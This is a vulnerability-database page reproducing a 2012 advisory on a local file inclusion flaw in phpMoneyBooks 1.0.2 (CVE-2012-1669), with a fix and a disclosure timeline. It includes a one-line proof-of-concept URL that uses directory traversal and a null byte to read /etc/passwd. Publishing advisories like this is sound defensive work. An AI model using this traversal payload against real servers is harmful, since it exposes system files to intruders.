Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27907
HistoryApr 09, 2012 - 12:00 a.m.

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)

2012-04-0900:00:00
vulners.com
31
JSON

'phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - [email protected]

I. DESCRIPTION

A vulnerability exists in index.php for module handling that allows
for local file inclusion using a null-byte attack on the 'module' GET
parameter.

II. TESTED VERSION

1.0.2

III. PoC EXPLOIT

http://localhost/phpMoneyBooks102/index.php?module=../../../../../etc/passwd%00

IV. NOTES

  • magic_quotes_gpc must be disabled and PHP must be < 5.3.4 for
    null-byte attacks to work

V. SOLUTION

Upgrade to 1.0.3 or above.

VI. REFERENCES

http://phpmoneybooks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1669

VII. TIMELINE

02/29/2012 - Initial vendor disclosure
03/01/2012 - Vendor patched and released an updated version
03/22/2012 - Public disclosure

Related

cve 2
dsquare 1
packetstorm 1
prion 2
exploitpack 1
exploitdb 1
securityvulns 1
cve
cve
CVE-2012-1669
2014-11-17 22:59:00
CVE-2012-6665
2014-11-17 22:59:00
dsquare
dsquare
phpMoneyBooks LFI
2012-03-27 00:00:00
packetstorm
packetstorm
phpMoneyBooks 1.0.2 Local File Inclusion
2012-03-23 00:00:00
prion
prion
Directory traversal
2014-11-17 22:59:00
Directory traversal
2014-11-17 22:59:00
exploitpack
exploitpack
phpMoneyBooks 1.0.2 - Local File Inclusion
2012-03-22 00:00:00
exploitdb
exploitdb
phpMoneyBooks 1.0.2 - Local File Inclusion
2012-03-22 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2012-04-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:27907
cve2dsquare1packetstorm1prion2exploitpack1exploitdb1securityvulns1